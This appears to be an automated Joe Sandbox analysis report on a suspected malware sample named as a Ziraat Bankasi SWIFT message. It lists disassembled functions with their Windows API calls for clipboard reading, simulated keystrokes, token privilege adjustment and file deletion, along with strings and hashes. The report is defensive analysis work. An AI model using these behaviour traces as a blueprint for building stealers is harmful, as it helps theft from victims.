Instruction ID: 3ed5d74e28a329828ac38ab5a3324817ae23dc046abb42e33c257ad42662648c
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: F4D05E3090520CABCB10CAA4A90499E73A89705361F204754E915832C0D5B19E009B60

Function 00C06DD4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00C06DE9

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 228228e03a112500e8dbdc0a8a524e4dd0fe14b0438be74b2c4a579afede6d62
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 2BE0BF7494020DEFDB00DFA4D6496DE7BB4EF04311F1005A1FD05D7680DB309E64CA62

Function 00C06DD8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00C06DE9

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c2ec7e9a75da582fd9b4de40a0d921d5cedd09e72b27e875cbb41a84e9b3c318
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: A2E0E67494020DDFDB00DFB4D64969E7BF4EF04301F100161FD01D2280D6309E60CA62

Non-executed Functions

Function 0010F7FF Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0010F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0010F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0010F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0010F940
SendMessageW.USER32 ref: 0010F966
_wcsncpy.LIBCMT ref: 0010F9D2
GetKeyState.USER32(00000011), ref: 0010F9F3
GetKeyState.USER32(00000009), ref: 0010FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0010FA16
GetKeyState.USER32(00000010), ref: 0010FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0010FA4F
SendMessageW.USER32 ref: 0010FA72
SendMessageW.USER32(?,00001030,?,0010E059), ref: 0010FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0010FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0010FB96
SetCapture.USER32(?), ref: 0010FB9F
ClientToScreen.USER32(?,?), ref: 0010FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0010FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0010FC29
ReleaseCapture.USER32 ref: 0010FC34
GetCursorPos.USER32(?), ref: 0010FC69
ScreenToClient.USER32(?,?), ref: 0010FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0010FCD8
SendMessageW.USER32 ref: 0010FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0010FD41
SendMessageW.USER32 ref: 0010FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0010FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0010FD8F
GetCursorPos.USER32(?), ref: 0010FDB0
ScreenToClient.USER32(?,?), ref: 0010FDBD
GetParent.USER32(?), ref: 0010FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0010FE3F
SendMessageW.USER32 ref: 0010FE6F
ClientToScreen.USER32(?,?), ref: 0010FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0010FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0010FF19
SendMessageW.USER32 ref: 0010FF3C
ClientToScreen.USER32(?,?), ref: 0010FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0010FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0011004B

Strings

@GUI_DRAGID, xrefs: 0010FBCC
@U=u, xrefs: 0010F8DC, 0010F940, 0010F966, 0010FA16, 0010FB6F, 0010FE3F, 0010FE6F, 0010FF19, 0010FF3C
F, xrefs: 0010FF42

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$@U=u$F
API String ID: 2516578528-1007936534
Opcode ID: 17d3677d7506d0eb9503d62269748c30b8d4801448def2e551fe66aa17e923dc
Instruction ID: e4518a0bdfe752f82dbf39654566efe6c0e2c27b7b1d7f7035eb316af334a2e6
Opcode Fuzzy Hash: 17d3677d7506d0eb9503d62269748c30b8d4801448def2e551fe66aa17e923dc
Instruction Fuzzy Hash: 2732BA74604345EFDB24CF64C885AAABBA4FF48344F144A2EF59587AE1C7B0DCA2CB51

Function 0010AACE Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0010B1CD

Strings

@U=u, xrefs: 0010AB64, 0010ABB8, 0010AC6B, 0010ACB2, 0010ACDA, 0010AE3F, 0010AEDA, 0010AF24, 0010AF6E, 0010AF8E, 0010B07A, 0010B0B3, 0010B104, 0010B16F, 0010B1CD
%d/%02d/%02d, xrefs: 0010AEFC

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d$@U=u
API String ID: 3850602802-2764005415
Opcode ID: bbe8929ee825463234ef6b143c742c5006c5163c541681ec1ce71a6302add019
Instruction ID: fad4a1078ed048e09dcf9541b937436a9834eb5137fa165771d20bd0378fd3a2
Opcode Fuzzy Hash: bbe8929ee825463234ef6b143c742c5006c5163c541681ec1ce71a6302add019
Instruction Fuzzy Hash: 0C12E171604319ABEB28AF64DC89FAE7BB8FF45710F104119F95ADB2D1DBB08942CB11

Function 000BEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 000BEB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00113AEA
IsIconic.USER32(000000FF), ref: 00113AF3
ShowWindow.USER32(000000FF,00000009), ref: 00113B00
SetForegroundWindow.USER32(000000FF), ref: 00113B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00113B20
GetCurrentThreadId.KERNEL32 ref: 00113B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00113B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00113B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00113B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00113B54
SetForegroundWindow.USER32(000000FF), ref: 00113B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00113B6C
keybd_event.USER32(00000012,00000000), ref: 00113B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00113B81
keybd_event.USER32(00000012,00000000), ref: 00113B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00113B8F
keybd_event.USER32(00000012,00000000), ref: 00113B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00113B9E
keybd_event.USER32(00000012,00000000), ref: 00113BA3
SetForegroundWindow.USER32(000000FF), ref: 00113BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00113BCD

Strings

Shell_TrayWnd, xrefs: 00113AE5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 02d2a37d45130907f5d90c5b7ce951cf080f88b4543b95abc3fe9eaa7a2141d2
Instruction ID: 80bfe6d1a5120a5ddb902da1dd033d2510d50a6ef752c17956424f813c1323ff
Opcode Fuzzy Hash: 02d2a37d45130907f5d90c5b7ce951cf080f88b4543b95abc3fe9eaa7a2141d2
Instruction Fuzzy Hash: 0531A371A40218BBEB341B65DC49FBF7E6CEF44B50F114025FA05EA1D0D7B05D91AAA0

Function 000DACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 000DB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000DB180
Part of subcall function 000DB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000DB1AD
Part of subcall function 000DB134: GetLastError.KERNEL32 ref: 000DB1BA

_memset.LIBCMT ref: 000DAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000DAD5A
CloseHandle.KERNEL32(?), ref: 000DAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000DAD82
GetProcessWindowStation.USER32 ref: 000DAD9B
SetProcessWindowStation.USER32(00000000), ref: 000DADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000DADBF

Part of subcall function 000DAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000DACC0), ref: 000DAB99
Part of subcall function 000DAB84: CloseHandle.KERNEL32(?,?,000DACC0), ref: 000DABAB

Strings

winsta0, xrefs: 000DAD7D
default, xrefs: 000DADBA
, xrefs: 000DAD17

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 085bfe491e1e7a27d1b048bfd4d142ac3e54a5842d0c8ac55227064b81f50126
Instruction ID: 357a0975b2fe5d5b9c933bcbe9b893239fabaeea73d9c486282607dfa7df1d54
Opcode Fuzzy Hash: 085bfe491e1e7a27d1b048bfd4d142ac3e54a5842d0c8ac55227064b81f50126
Instruction Fuzzy Hash: 51818BB1A00309BFDF219FA4DC45AEEBBB8EF05304F04416AF814A6661D7318E55DB71

Function 000E60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000E6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000E5FA6,?), ref: 000E6ED8

Part of subcall function 000E6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000E5FA6,?), ref: 000E6EF1

Part of subcall function 000E725E: __wsplitpath.LIBCMT ref: 000E727B
Part of subcall function 000E725E: __wsplitpath.LIBCMT ref: 000E728E

Part of subcall function 000E72CB: GetFileAttributesW.KERNEL32(?,000E6019), ref: 000E72CC

_wcscat.LIBCMT ref: 000E6149
_wcscat.LIBCMT ref: 000E6167
__wsplitpath.LIBCMT ref: 000E618E
FindFirstFileW.KERNEL32(?,?), ref: 000E61A4
_wcscpy.LIBCMT ref: 000E6209
_wcscat.LIBCMT ref: 000E621C
_wcscat.LIBCMT ref: 000E622F
lstrcmpiW.KERNEL32(?,?), ref: 000E625D
DeleteFileW.KERNEL32(?), ref: 000E626E
MoveFileW.KERNEL32(?,?), ref: 000E6289
MoveFileW.KERNEL32(?,?), ref: 000E6298
CopyFileW.KERNEL32(?,?,00000000), ref: 000E62AD
DeleteFileW.KERNEL32(?), ref: 000E62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 000E62E1
FindClose.KERNEL32(00000000), ref: 000E62FD
FindClose.KERNEL32(00000000), ref: 000E630B

Strings

\*.*, xrefs: 000E6138, 000E6147, 000E6165

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 5c86cec7bc2123658dd8112b5f4118de150603a3c21cb5e8dda2d41ca61263c5
Instruction ID: 98d7bc2cd8b4eb0ff318612c654b5bb96529978f02cb34210819dea071953e4b
Opcode Fuzzy Hash: 5c86cec7bc2123658dd8112b5f4118de150603a3c21cb5e8dda2d41ca61263c5
Instruction Fuzzy Hash: CC51017290815CAECB21EBA2DC45DDFB7FCAF15340F0901EAE645F2142DA3697898F94

Function 000F6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0013DC00), ref: 000F6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 000F6B44
GetClipboardData.USER32(0000000D), ref: 000F6B4C
CloseClipboard.USER32 ref: 000F6B58
GlobalLock.KERNEL32(00000000), ref: 000F6B74
CloseClipboard.USER32 ref: 000F6B7E
GlobalUnlock.KERNEL32(00000000), ref: 000F6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 000F6BA0
GetClipboardData.USER32(00000001), ref: 000F6BA8
GlobalLock.KERNEL32(00000000), ref: 000F6BB5
GlobalUnlock.KERNEL32(00000000), ref: 000F6BE9
CloseClipboard.USER32 ref: 000F6CF6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 997ed95c257a171aab09e56eeaee1e80421dbd842638ca4d135f2c94e9b13ce5
Instruction ID: f73b4233a2725fd45a2b7980ee2b798e8f9e0bb3f6431d4e97011e7d659906e5
Opcode Fuzzy Hash: 997ed95c257a171aab09e56eeaee1e80421dbd842638ca4d135f2c94e9b13ce5
Instruction Fuzzy Hash: 9851C431204205ABE320EF60ED46FBE77A8AF95B00F010029F696D79D2DF71D9469B62

Function 000EF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000EF62B
FindClose.KERNEL32(00000000), ref: 000EF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000EF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000EF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 000EF6E2
__swprintf.LIBCMT ref: 000EF72E
__swprintf.LIBCMT ref: 000EF767
__swprintf.LIBCMT ref: 000EF7BB

Part of subcall function 000C172B: __woutput_l.LIBCMT ref: 000C1784

__swprintf.LIBCMT ref: 000EF809
__swprintf.LIBCMT ref: 000EF858
__swprintf.LIBCMT ref: 000EF8A7
__swprintf.LIBCMT ref: 000EF8F6

Strings

%4d, xrefs: 000EF761
%02d, xrefs: 000EF7B0, 000EF7B9, 000EF807, 000EF856, 000EF8A5, 000EF8F4
%4d%02d%02d%02d%02d%02d, xrefs: 000EF728

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 45a10f334eff59c759ca5ed0574bdf76ee3d469ac6c53881aa1c52c7f7533cc3
Instruction ID: 61a0adaf2df97c2304bd223a08e19da289c5808e9d560737a262bf4ce404a292
Opcode Fuzzy Hash: 45a10f334eff59c759ca5ed0574bdf76ee3d469ac6c53881aa1c52c7f7533cc3
Instruction Fuzzy Hash: B1A13DB2408344AFD310EBA5C885DEFB7ECAF99300F44092EF595C6152EB34DA49CB62

Function 000F1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 000F1B50
_wcscmp.LIBCMT ref: 000F1B65
_wcscmp.LIBCMT ref: 000F1B7C
GetFileAttributesW.KERNEL32(?), ref: 000F1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 000F1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 000F1BC0
FindClose.KERNEL32(00000000), ref: 000F1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 000F1BE7
_wcscmp.LIBCMT ref: 000F1C0E
_wcscmp.LIBCMT ref: 000F1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 000F1C37
SetCurrentDirectoryW.KERNEL32(001539FC), ref: 000F1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 000F1C5F
FindClose.KERNEL32(00000000), ref: 000F1C6C
FindClose.KERNEL32(00000000), ref: 000F1C7C

Strings

*.*, xrefs: 000F1BE2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: ccc1b9c04c7cac23be53e5dd45085f918c1066386c158747db896ea791297527
Instruction ID: fddd459b65dec7eada1cb8c52a5e92dd7725d21d3fff92540a0b0ec2f33abc34
Opcode Fuzzy Hash: ccc1b9c04c7cac23be53e5dd45085f918c1066386c158747db896ea791297527
Instruction Fuzzy Hash: A231D33250021DFFCF20ABB0EC49AEE77ECAF05320F104195EA11E3491EB70DA959AA4

Function 000F1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 000F1CAB
_wcscmp.LIBCMT ref: 000F1CC0
_wcscmp.LIBCMT ref: 000F1CD7

Part of subcall function 000E6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000E6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 000F1D06
FindClose.KERNEL32(00000000), ref: 000F1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 000F1D2D
_wcscmp.LIBCMT ref: 000F1D54
_wcscmp.LIBCMT ref: 000F1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 000F1D7D
SetCurrentDirectoryW.KERNEL32(001539FC), ref: 000F1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 000F1DA5
FindClose.KERNEL32(00000000), ref: 000F1DB2
FindClose.KERNEL32(00000000), ref: 000F1DC2

Strings

*.*, xrefs: 000F1D28

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 79d5efb8d255c6634161cfcb9c6f4c7a460c51943c0ef716bb43da0129c78fc0
Instruction ID: e57972a538a35857e9febc2cfbe4a85815dc906c1efc3b7f54c8fddead61983d
Opcode Fuzzy Hash: 79d5efb8d255c6634161cfcb9c6f4c7a460c51943c0ef716bb43da0129c78fc0
Instruction Fuzzy Hash: C431F43250061EFFCF20EBA0EC09AEE37BD9F45364F104595E921A3591DB70DA95DAA0

Function 000A7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A7DBD

Strings

Q\E, xrefs: 000A86D6
\b(?=\w), xrefs: 0011F85E
], xrefs: 000A7D9F
\, xrefs: 0011F95B
[, xrefs: 000A7E14
\, xrefs: 000A7D89
^, xrefs: 000A7D96
[:<:]], xrefs: 000A7D1D
\b(?<=\w), xrefs: 0011F877
\, xrefs: 000A7E1D
[:>:]], xrefs: 000A7D37

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: fb3f7219b6443e63460d33c37dae7af31a49337d518cc43607398a78660c95e2
Instruction ID: a39663bd89243b8bcfd3f8ded49260e4e523725d1df9c1a99fe802b74747afee
Opcode Fuzzy Hash: fb3f7219b6443e63460d33c37dae7af31a49337d518cc43607398a78660c95e2
Instruction Fuzzy Hash: 5B829F71D04219DBCF28CF98C8807EDBBB1BF49314F258179D859AB291E7749E86CB90

Function 000F091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000F09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 000F09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000F09FB
__wsplitpath.LIBCMT ref: 000F0A59
_wcscat.LIBCMT ref: 000F0A71
_wcscat.LIBCMT ref: 000F0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 000F0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 000F0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 000F0AFF
_wcscpy.LIBCMT ref: 000F0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000F0B4A

Strings

*.*, xrefs: 000F0B05

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

